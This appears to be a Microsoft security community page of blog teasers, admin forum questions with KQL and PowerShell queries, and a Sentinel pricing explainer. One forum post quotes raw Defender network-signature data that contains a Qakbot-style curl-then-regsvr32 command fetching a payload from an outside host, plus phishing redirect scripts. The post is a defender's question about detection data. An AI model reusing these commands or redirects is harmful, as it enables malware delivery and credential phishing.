Security and AI Essentials
Protect your organization with AI-powered, end-to-end security.
Defend Against Threats
Get ahead of threat actors with integrated solutions.
Secure All Your Clouds
Protection from code to runtime.
Secure All Access
Secure access for any identity, anywhere, to any resource.
Protect Your Data
Comprehensive data security across your entire estate.
Recent Blogs
It’s Time To Act
Microsoft's Digital Defense Report 2025 clearly describes the cyber threat landscape that this guidance is situated in, one that has become more complex, more industrialized, and i...
Dec 02, 2025 · 57 Views · 1 Like · 0 Comments
What's new in Defender for Cloud?
Defender for Cloud integrates into the Defender portal as part of the broader Microsoft Security ecosystem, now in public preview. This integration, while adding ...
Dec 01, 2025 · 148 Views · 1 Like · 0 Comments
1.0 Introduction
Cloud storage stands at the core of AI-driven applications, making its security more vital than ever. As generative AI continues to drive innovation, protecting the storage infrast...
Dec 01, 2025 · 97 Views · 1 Like · 0 Comments
Ignite 2025 delivered groundbreaking innovations for securing the agentic era—where AI agents transform how we work and collaborate. If you missed the live sessions, news announcements, or want to di...
Dec 01, 2025 · 171 Views · 0 Likes · 0 Comments
Recent Discussions
How to stop incidents merging under a new incident (MultiStage) in Defender
Dear All,

We are experiencing a challenge with the integration between Microsoft Sentinel and the Defender portal: multiple custom rule alerts and analytic rule incidents are being automatically merged into a single incident named "Multistage." This automatic incident merging affects the granularity and context of our investigations, especially for important custom use cases such as specific admin activities and differentiated analytic logic. Key concerns include:

- Custom rule alerts from Sentinel merging undesirably into a single "Multistage" incident in Defender, causing loss of incident-specific investigation value.
- Analytic rules arising from different data sources and detection logic being merged, although they represent distinct security events needing separate attention.
- Customers require and depend on distinct, non-merged incidents for custom use cases, and the current incident correlation and merging behavior undermines this requirement.

We understand that Defender's incident correlation engine merges incidents based on overlapping entities, timelines, and behaviors, but we would like guidance or configuration best practices to disable or minimize this automatic merging behavior for our custom and analytic rule incidents. Our goal is to maintain independent incidents corresponding exactly to our custom alerts so that hunting, triage, and response workflows remain precise and actionable. Any recommendations or advanced configuration options to achieve this separation would be greatly appreciated.

Thank you for your assistance. Best regards
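For questions like this, it helps to first quantify how much correlation is actually happening. A minimal KQL sketch, run in the Sentinel workspace and assuming the standard SecurityIncident and SecurityAlert tables (the title regex is an assumption; adjust it to match how your merged incidents are named):

```kusto
// Enumerate the alerts that the correlation engine has folded into
// "Multi-stage"-style incidents, to gauge how much granularity is lost.
SecurityIncident
| where TimeGenerated > ago(30d)
| where Title matches regex @"(?i)multi-?stage"
| summarize arg_max(TimeGenerated, *) by IncidentNumber    // latest state of each incident
| mv-expand AlertId = AlertIds to typeof(string)           // AlertIds is a dynamic array
| join kind=inner (
    SecurityAlert
    | summarize arg_max(TimeGenerated, AlertName, ProviderName) by SystemAlertId
) on $left.AlertId == $right.SystemAlertId
| project IncidentNumber, Title, AlertName, ProviderName
| order by IncidentNumber asc
```

This only measures the behavior rather than changing it; if the engine offers no per-rule opt-out in your tenant, the output is mainly useful for scoping a support case or identifying which custom rules are most affected.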
Block all 365 apps except Outlook via CA
Trying to block 365 for a subset of users, except email. The old app-based CA rules made this easy. The new 'resource'-based setup... I'm not even sure if it's possible. Copilot just keeps telling me to use the old version of CA, because it hasn't clued into Microsoft's downgrade cycle. If I try to filter by resource attribute, I'm told I don't have permission to do so. I'm the global admin. Here's what searching for Outlook and Exchange gives me. Advice? We ARE Intune licensed, but I'm not sure App Protection Policies will help here. The intention is to block BYOD from accessing anything but Outlook / Exchange. That is, mobile devices that aren't (whatever param I decide on).
Microsoft Purview Roles for Data Consumers in a Data Mesh & Data Democratisation Environment
I'm seeking guidance on whether the following set of Microsoft Purview roles is appropriate for typical data consumers within a Data Mesh-aligned organisation. The approach aims to support data democratisation while maintaining least-privilege access. Data consumers (all users) would be placed into a dedicated security group assigned to these roles, ensuring they have the best possible search experience across the Microsoft Purview Unified Catalogue, Data Map, and Data Health features.

Unified Catalog Settings
- Global Catalog Reader: Provides read-only visibility of all catalogued assets across the organisation. This role supports governance, compliance, and data discovery without granting modification rights. Using Global Catalog Reader simplifies onboarding and improves usability by giving users a consistent view of published business concepts and data products across all governance domains. Without it, visibility must be managed domain by domain through roles such as Governance Domain Reader or Local Catalog Reader, which increases administrative effort and limits discoverability. Sensitive domains can still apply additional scoped roles where required.
- Data Health Reader: Allows users to view data health metrics such as completeness, freshness, and anomaly indicators. This supports data stewards, quality teams, and analysts in monitoring reliability without the ability to change data or rules.

Unified Catalog Governance Domain Roles
- Data Quality Reader: Provides insight into data quality rules and results within a governance domain. Useful for users who need to understand quality issues or compliance status without editing capabilities.
- Data Profile Reader (conditional): Enables access to profiling information such as distributions, null counts, and detected patterns. However, profiling data may reveal sensitive information, so this role is best reserved for trusted analysts or stewards rather than being broadly granted to all data consumers.

Data Map Role Assignments
- Data Reader: Grants read-only access to metadata and lineage across the data map. This transparency is important for impact assessments, understanding dependencies, and supporting governance processes.
- Insights Reader: Provides access to Purview Insights dashboards, including usage statistics, scanning activity, and classification trends. This role is typically valuable for managers or governance leads monitoring adoption and compliance.

Summary: Together, these roles aim to give data consumers the access they need for discovery, quality awareness, and understanding lineage, without exposing sensitive data or granting any capability to modify assets. The intention is to follow least-privilege practice while enabling meaningful self-service analytics.
26 Views · 0 Likes · 0 Comments
MDE use of Certificate based IoC not working
I have been trying to use MDE IoC with certificates as per the following link: https://learn.microsoft.com/en-us/defender-endpoint/indicator-certificates#create-an-indicator-for-certificates-from-the-settings-page
This is on a demo tenant with full M365 E5 licenses and the vulnerability trial enabled just in case. Test devices are:
- Windows 11 with latest updates, domain joined and managed by Intune
- MDE onboarded and active with AV
- Network protection in block mode
- Cloud-delivered protection enabled
- File hash enabled
- In Defender portal > Settings > Endpoints > Advanced settings, all options enabled
I am testing with Firefox: the installer and the application .exe after installation. I have extracted the leaf certificate from both of these .exe's using the helpful information in the following link: https://www.linkedin.com/pulse/microsoft-defender-missing-manual-how-actually-create-adair-collins-paiye/
I then uploaded the certs into Defender portal > Settings > Endpoints > IoC > Certificates, set to Block and remediate.
Issue: It's been 24h and nothing happens on the client devices. In the Defender portal (Assets > Devices > device timeline) I can see the Firefox processes, but at no point is the installer or application blocked. Have I misunderstood how the feature works? Has anyone else managed to get this to work? Advice appreciated. Thanks, Warren
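One thing worth checking before concluding the feature is broken: whether the signer data MDE itself records for those binaries matches the leaf certificate that was uploaded. A minimal advanced-hunting sketch, assuming the standard DeviceFileCertificateInfo table (the "Mozilla" signer filter is an assumption for this Firefox test):

```kusto
// What certificate details has MDE actually recorded for the test binaries?
// The certificate indicator has to match what Defender sees here.
DeviceFileCertificateInfo
| where Timestamp > ago(7d)
| where Signer has "Mozilla"
| project Timestamp, DeviceName, SHA1, Signer, Issuer,
          CertificateSerialNumber, SignatureType, IsTrusted
| order by Timestamp desc
```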
Sensitivity Labels and CoPilot - "No AI"
As a Purview Administrator, I recently received a request that might resonate with many of you: add a "No AI" designation to every sublabel we have. Why? Because our contracts and EULAs explicitly state that certain documents must not be used with AI tools. This raises an important question: what's the best way to implement this without creating unnecessary complexity?
The Challenge
If we simply append "NoAI" to every existing label and sublabel, we end up duplicating our entire labeling structure. For example, if you follow Microsoft's guidance on default sensitivity labels and policies, doing this "times two" for every label and sublabel is clearly not scalable. How do you deploy it? Best regards, Stephan
54 Views · 2 Likes · 1 Comment
IdentityLogonEvents - IsNtlmV1
Hi, I cannot find documentation on how the IdentityLogonEvents table's AdditionalFields.IsNtlmV1 is populated. In a demo environment, I intentionally "enforced" NTLMv1 and made an NTLMv1 connection to a domain controller. On the DC's Security log, event ID 4624 shows correct info:

```
Detailed Authentication Information:
  Logon Process:              NtLmSsp
  Authentication Package:     NTLM
  Transited Services:         -
  Package Name (NTLM only):   NTLM V1
  Key Length:                 128
```

On the MDI side, however, it looks like this (using the following KQL to display the relevant info):

```kusto
IdentityLogonEvents
| where ReportId == @"f70dbd37-af8e-4e4e-a77d-b4250f9e0d0b"
| extend AdditionalFields = todynamic(AdditionalFields)
| project TimeGenerated, ActionType, Application, LogonType, Protocol,
          IsNtlmV1 = AdditionalFields.IsNtlmV1
```

TimeGenerated              ActionType    Application       LogonType               Protocol  IsNtlmV1
Nov 28, 2025 10:43:05 PM   LogonSuccess  Active Directory  Credentials validation  Ntlm      false

Can someone please explain under which circumstances the IsNtlmV1 property will become "true"? Thank you in advance
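To see how the flag behaves beyond a single event, a broader survey over the same table may help. A minimal sketch (Timestamp is the advanced-hunting column name; use TimeGenerated if running this in Sentinel):

```kusto
// Survey all NTLM logons MDI has reported and how IsNtlmV1 is populated,
// to spot any ActionType/LogonType combination where it flips to true.
IdentityLogonEvents
| where Timestamp > ago(30d)
| where Protocol == "Ntlm"
| extend IsNtlmV1 = tostring(todynamic(AdditionalFields).IsNtlmV1)
| summarize Logons = count() by ActionType, LogonType, IsNtlmV1
| order by Logons desc
```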
NetworkSignatureInspected
Hi, whilst looking into something, I was thrown off by a line in a device timeline export with an ActionType of NetworkSignatureInspected, and by its content. I've read this article, so I understand the basics of the function: Enrich your advanced hunting experience using network layer signals from Zeek. I popped over to Sentinel to widen the search as I was initially concerned, but now think it's expected behaviour, as I see the same data from different devices. Can anyone provide any clarity on the contents of AdditionalFields where the ActionType is NetworkSignatureInspected and it references, for example, CVE-2021-44228:

${token}/sendmessage`,{method:"post",%90%00%02%10%00%00%A1%02%01%10*%A9Cj)|%00%00$%B7%B9%92I%ED%F1%91%0B\%80%8E%E4$%B9%FA%01.%EA%FA<title>redirecting...</title><script>window.location.href="https://uyjh8.phiachiphe.ru/bjop8dt8@0uv0/#%90%02%1F@%90%02%1F";%90%00!#SCPT:Trojan:BAT/Qakbot.RVB01!MTB%00%02%00%00%00z%0B%01%10%8C%BAUU)|%00%00%CBw%F9%1Af%E3%B0?\%BE%10|%CC%DA%BE%82%EC%0B%952&&curl.exe--output%25programdata%25\xlhkbo\ff\up2iob.iozv.zmhttps://neptuneimpex.com/bmm/j.png&&echo"fd"&&regsvr32"%90%00!#SCPT:Trojan:HTML/Phish.DMOH1!MTB%00%02%00%00%00{%0B%01%10%F5):[)|%00%00v%F0%ADS%B8i%B2%D4h%EF=E"#%C5%F1%FFl>J<scripttype="text/javascript">window.location="https://

Defender reports no issues on the device, and logs (for example DeviceNetworkEvents or CommonSecurityLog) don't return any hits for the sites referenced. Any assistance with rationalising this would be great, thanks.
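One way to rationalise this is to aggregate the events fleet-wide: if the same signature strings appear across many devices, they are shared inspection signatures rather than activity on one host. A minimal sketch, assuming a SignatureName key inside AdditionalFields (the field name is an assumption; adjust it to whatever your events actually carry):

```kusto
// Count NetworkSignatureInspected events by signature across the fleet.
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where ActionType == "NetworkSignatureInspected"
| extend Signature = tostring(todynamic(AdditionalFields).SignatureName)
| summarize Events = count(), Devices = dcount(DeviceId) by Signature
| order by Events desc
```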
DLP Rule for Exchange using ExceptIfRecipientDomainIs not working any more
Hello, we had set up a DLP rule for Exchange workloads that only allows sending to specific external recipients in a list we provide by populating the ExceptIfRecipientDomainIs attribute. This had been working fine until a few days back, when suddenly the rule was failing to apply for end users (the domain is listed in the rule's ExceptIfRecipientDomainIs) and email gets blocked. I then realized that the attribute is not populated anymore via PowerShell and comes back empty:

```powershell
(Get-DlpComplianceRule -Identity "DLPRULE").ExceptIfRecipientDomainIs
```

At the same time, the rule on the compliance.microsoft.com portal shows up properly with the domains in question. I then noticed that those domains now appear only under the AdvancedRule attribute:

```powershell
(Get-DlpComplianceRule -Identity "DLPRULE") | Select-Object -ExpandProperty AdvancedRule
```

So it seems there has been some change in DLP rules by the compliance team at Microsoft?
1.8K Views · 0 Likes · 3 Comments
Break-glass Account Prompted for Authenticator App Despite Exclusions
We have a break-glass account configured with two FIDO2 security keys as the only authentication method. The account is:
- Excluded from Microsoft Authenticator in the Authentication Methods policy (the included target is a dynamic group containing all users except the break-glass account)
- Excluded from the MFA Registration Campaign (again, the included target is a dynamic group containing all users except the break-glass account)
- Excluded from all Conditional Access policies
However, whenever we test the account, it still gets prompted to set up the Microsoft Authenticator app during sign-in. We can skip the setup, but ideally the prompt should not appear for this account. How can we prevent the Authenticator setup prompt entirely for this break-glass account?
46 Views · 0 Likes · 2 Comments
What are the prerequisites to see Microsoft Secure Score?
My teammate says that even a Basic or Standard M365 license provides Secure Score, which is kind of right, as you can see a basic score when opening a tenant in Lighthouse. But if you go to the Defender console, open the Exposure menu, and press Secure Score, it won't load with just Standard/Basic licenses assigned to users. I have tried to find a definitive list, but I can't. Copilot said you need at least Business Premium, E3/E5, or Defender P1, which seems to make sense, but I need confirmation. And also, why do I see some score on the tenant's page in Lighthouse?
Issue with the Canadian Drivers License SIT
Did anyone face an issue with the Canadian Driver's License SIT in the DLP policy? We see a lot of false positives, especially around the BC province number, NB, Prince Edward Island, and Saskatchewan. These provinces have licence numbers that are just digits, which can flag any kind of digits. Even with a custom RegEx and a reduced keyword list, it still flags a lot of false positives. We see this more and more, and customers are not happy with it. Has anyone found a breakthrough or a best solution for deploying the Canadian Driver's License DLP?
sensor service fails to start
Hello, I've installed MDI on all of our domain controllers and everything went fine. I am trying to install MDI on our Entra Connect server and our certificate authority server (which are not domain controllers), and the service is continually failing to start. Could someone please point me in the right direction on how to rectify this? I've tried:
- recreating the service account (3x)
- checking the service account with Test-ADServiceAccount (works fine from both member servers)
- verifying the service account is given the right to log on as a service
The error log is very vague:

```
2025-11-13 19:05:30.0968 Error DirectoryServicesClient+<CreateLdapConnectionAsync>d__49 Microsoft.Tri.Infrastructure.ExtendedException: CreateLdapConnectionAsync failed [DomainControllerDnsName={FQDN of DC}]
   at async Task<LdapConnection> Microsoft.Tri.Sensor.DirectoryServicesClient.CreateLdapConnectionAsync(DomainControllerConnectionData domainControllerConnectionData, bool isGlobalCatalog, bool isTraversing)
   at async Task<bool> Microsoft.Tri.Sensor.DirectoryServicesClient.TryCreateLdapConnectionAsync(DomainControllerConnectionData domainControllerConnectionData, bool isGlobalCatalog, bool isTraversing)
2025-11-13 19:05:30.1124 Error DirectoryServicesClient Microsoft.Tri.Infrastructure.ExtendedException: Failed to communicate with configured domain controllers [_domainControllerConnectionDatas={FQDN of DC}]
   at new Microsoft.Tri.Sensor.DirectoryServicesClient(IConfigurationManager configurationManager, IDirectoryServicesDomainNetworkCredentialsManager domainNetworkCredentialsManager, IDomainTrustMappingManager domainTrustMappingManager, IRemoteImpersonationManager remoteImpersonationManager, IMetricManager metricManager, IWorkspaceApplicationSensorApiJsonProxy workspaceApplicationSensorApiJsonProxy)
   at object lambda_method(Closure, object[])
   at object Autofac.Core.Activators.Reflection.ConstructorParameterBinding.Instantiate()
   at void Microsoft.Tri.Infrastructure.ModuleManager.AddModules(Type[] moduleTypes)
   at new Microsoft.Tri.Sensor.SensorModuleManager()
   at ModuleManager Microsoft.Tri.Sensor.SensorService.CreateModuleManager()
   at async Task Microsoft.Tri.Infrastructure.Service.OnStartAsync()
   at void Microsoft.Tri.Infrastructure.TaskExtension.Await(Task task)
   at void Microsoft.Tri.Infrastructure.Service.OnStart(string[] args)
```
245 Views · 0 Likes · 5 Comments
Understand New Sentinel Pricing Model with Sentinel Data Lake Tier

Introduction to Sentinel and its New Pricing Model
Microsoft Sentinel is a cloud-native Security Information and Event Management (SIEM) and Security Orchestration, Automation, and Response (SOAR) platform that collects, analyzes, and correlates security data from across your environment to detect threats and automate response. Traditionally, Sentinel stored all ingested data in the Analytics tier (Log Analytics workspace), which is powerful but expensive for high-volume logs. To reduce cost and enable customers to retain all security data without compromise, Microsoft introduced a new dual-tier pricing model consisting of the Analytics tier and the Data Lake tier. The Analytics tier continues to support fast, real-time querying and analytics for core security scenarios, while the new Data Lake tier provides very low-cost storage for long-term retention and high-volume datasets. Customers can now choose where each data type lands: the Analytics tier for high-value detections and investigations, and the Data Lake tier for large or archival types, allowing organizations to significantly lower cost while still retaining all their security data for analytics, compliance, and hunting.

[Flow diagram: the new Sentinel pricing model]

Now let's understand this new pricing model with the scenarios below:
- Scenario 1A (Pay-As-You-Go)
- Scenario 1B (Usage Commitment)
- Scenario 2 (Data Lake Tier Only)

Scenario 1A (Pay-As-You-Go)
Requirement
Suppose you need to ingest 10 GB of data per day, and you must retain that data for 2 years. However, you will only frequently use, query, and analyze the data for the first 6 months.
Solution
To optimize cost, you can ingest the data into the Analytics tier and retain it there for the first 6 months, where active querying and investigation happen. After that period, the remaining 18 months of retention can be shifted to the Data Lake tier, which provides low-cost storage for compliance and auditing needs. You will, however, be charged separately for Data Lake tier querying and analytics, depicted as Compute (D) in the pricing flow diagram.
Pricing Flow / Notes
- The first 10 GB/day ingested into the Analytics tier is free for 31 days under the Analytics logs plan.
- All data ingested into the Analytics tier is automatically mirrored to the Data Lake tier at no additional ingestion or retention cost.
- For the first 6 months, you pay only for Analytics tier ingestion and retention, excluding any free capacity.
- For the next 18 months, you pay only for Data Lake tier retention, which is significantly cheaper.
Azure Pricing Calculator Equivalent
Assuming no data is queried or analyzed during the 18-month Data Lake tier retention period: although the Analytics tier retention is set to 6 months, the first 3 months of retention fall under the free retention limit, so retention charges apply only for the remaining 3 months of the analytics retention window. The Azure pricing calculator will adjust accordingly.

Scenario 1B (Usage Commitment)
Now, suppose you are ingesting 100 GB per day. If you follow the same pay-as-you-go pricing model described above, your estimated cost would be approximately $15,204 per month (which works out to roughly $5 per ingested GB). However, you can reduce this cost by choosing a Commitment Tier, where Analytics tier ingestion is billed at a discounted rate. Note that the discount applies only to Analytics tier ingestion; it does not apply to Analytics tier retention costs or to any Data Lake tier-related charges. Please refer to the pricing flow and the equivalent pricing calculator results shown below.
Monthly cost savings: $15,204 – $11,184 = $4,020 per month
Now the question is: what happens if your usage reaches 150 GB per day? Will the additional 50 GB be billed at the pay-as-you-go rate? No. The entire 150 GB/day will still be billed at the discounted rate associated with the 100 GB/day commitment tier bucket.
Azure Pricing Calculator Equivalent (100 GB/day)
Azure Pricing Calculator Equivalent (150 GB/day)

Scenario 2 (Data Lake Tier Only)
Requirement
Suppose you need to store certain audit or compliance logs amounting to 10 GB per day. These logs are not used for querying, analytics, or investigations on a regular basis, but must be retained for 2 years per your organization's compliance or forensic policies.
Solution
Since these logs are not actively analyzed, you should avoid ingesting them into the Analytics tier, which is more expensive and optimized for active querying. Instead, send them directly to the Data Lake tier, where they can be retained cost-effectively for future audit, compliance, or forensic needs.
Pricing Flow
Because the data is ingested directly into the Data Lake tier, you pay both ingestion and retention costs there for the entire 2-year period. If, at any point in the future, you need to perform advanced analytics, querying, or search, you will incur additional compute charges based on actual usage. Even with occasional compute charges, the cost remains significantly lower than storing the same data in the Analytics tier.

Realized Savings

Scenario                                            Cost per Month
Scenario 1: 10 GB/day in Analytics tier             $1,520.40
Scenario 2: 10 GB/day directly into Data Lake tier  $202.20 (without compute)
                                                    $257.20 (with sample compute price)

Savings with no compute activity: $1,520.40 – $202.20 = $1,318.20 per month
Savings with some compute activity (sample value): $1,520.40 – $257.20 = $1,263.20 per month
Azure calculator equivalent without compute
Azure calculator equivalent with sample compute

Conclusion
The combination of the Analytics tier and the Data Lake tier in Microsoft Sentinel enables organizations to optimize cost based on how their security data is used. High-value logs that require frequent querying, real-time analytics, and investigation can be stored in the Analytics tier, which provides powerful search performance and built-in detection capabilities. At the same time, large-volume or infrequently accessed logs, such as audit, compliance, or long-term retention data, can be directed to the Data Lake tier, which offers dramatically lower storage and ingestion costs. Because all Analytics tier data is automatically mirrored to the Data Lake tier at no extra cost, customers can use the Analytics tier only for the period they actively query data, and rely on the Data Lake tier for the remaining retention. This tiered model allows different scenarios (active investigation, archival storage, compliance retention, or large-scale telemetry ingestion) to be handled at the most cost-effective layer, ultimately delivering substantial savings without sacrificing visibility, retention, or future analytical capabilities.
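To put this model into practice, the first step is knowing how much each table actually ingests, since that determines which tables are worth routing to the Data Lake tier. A minimal sizing sketch against the standard Usage table in the Log Analytics workspace:

```kusto
// Per-table billable ingestion over the last 30 days, in GB -
// a starting point for deciding Analytics tier vs. Data Lake tier.
Usage
| where TimeGenerated > ago(30d)
| where IsBillable == true
| summarize IngestedGB = round(sum(Quantity) / 1024, 2) by DataType   // Quantity is reported in MB
| order by IngestedGB desc
```

Tables dominated by high-volume, rarely queried telemetry at the top of this list are the natural candidates for Scenario 2 above.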
Convert Group Source of Authority to the cloud. Global Groups support?!
This is the exact feature we need; unfortunately, it's also unusable for an existing environment. Does anyone know when Entra SOA will support global groups? We have ZERO universal groups, and we are not going to convert to them.
14 Views · 0 Likes · 0 Comments
Onenote Files used in Malware attacks
Hi folks, any comments or recommendations regarding the increase in attacks via OneNote files, as noted in the articles below? I'm seeing an increased number of recommendations for blocking .one and .onepkg mail attachments. One issue is that .onepkg files currently cannot be added to the malware filter.
https://www.securityweek.com/microsoft-onenote-abuse-for-malware-delivery-surges/
https://labs.withsecure.com/publications/detecting-onenote-abuse
B Joshua
Solved
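Until a blocking control is in place, one interim option is simply to measure exposure. A hedged hunting sketch, assuming Defender for Office 365 advanced hunting (the EmailAttachmentInfo and EmailEvents tables) is available in the tenant:

```kusto
// Find inbound .one / .onepkg attachments and how they were delivered.
EmailAttachmentInfo
| where Timestamp > ago(30d)
| where FileName endswith ".one" or FileName endswith ".onepkg"
| join kind=inner (
    EmailEvents
    | project NetworkMessageId, Subject, DeliveryAction
) on NetworkMessageId
| project Timestamp, SenderFromAddress, RecipientEmailAddress,
          FileName, Subject, DeliveryAction
```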
Downgrading of encrypted label (User defined permission) in SPO to Desktop app
Hi, I have a file stored in SharePoint that was originally labeled Restricted with user-defined encryption. When I open the Word file from SharePoint using a desktop Office application and downgrade the label to Internal, the original encryption and permissions are still retained. This issue occurs only when opening the file from SharePoint in the desktop app: the previous protection settings persist even though the sensitivity label correctly updates to Internal. I've attached a screenshot for reference. Is there any official Microsoft documentation that explains why this behavior occurs and the underlying reason for it? Additionally, what is the recommended workaround if I want to fully remove user-defined permissions when downgrading the label? I have already tried reapplying the Internal label, but the file remains encrypted with the prior permissions.
Solved
Labels not showing up in office installed on clients
Hi, we have a case where we published labels to a customer from Purview. The labels are visible in the online Office applications, but they do not appear in the desktop client. The labels were published several weeks ago. The CLP folder on-premises exists, and when we open the file, we can see that it connects to Purview: the label names are visible in the XML file. Does anyone have any idea what we should check? What could be causing this issue? Why are the labels not showing up? We have an ongoing ticket with Microsoft, but it's taking time.
Solved · 78 Views · 0 Likes · 2 Comments
Tenant-based Microsoft Defender for Cloud Connector
As the title states, the connector shows as connected, but no alerts appear in Sentinel. The alerts exist in Defender for Cloud; they just do not show in Sentinel. The data connector is connected, and Log Analytics workspace exports are configured to send to the workspace resource group. What's missing?
172 Views · 0 Likes · 5 Comments
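A quick way to narrow down where the gap is: check whether any Defender for Cloud alerts have reached the workspace at all. A minimal sketch against the standard SecurityAlert table (Defender for Cloud alerts have historically carried the product name "Azure Security Center"; verify the value in your workspace):

```kusto
// If this returns nothing, the alert export path - not the connector
// status page - is the likely gap.
SecurityAlert
| where TimeGenerated > ago(14d)
| where ProductName == "Azure Security Center"
| summarize Alerts = count() by AlertName, bin(TimeGenerated, 1d)
| order by TimeGenerated desc
```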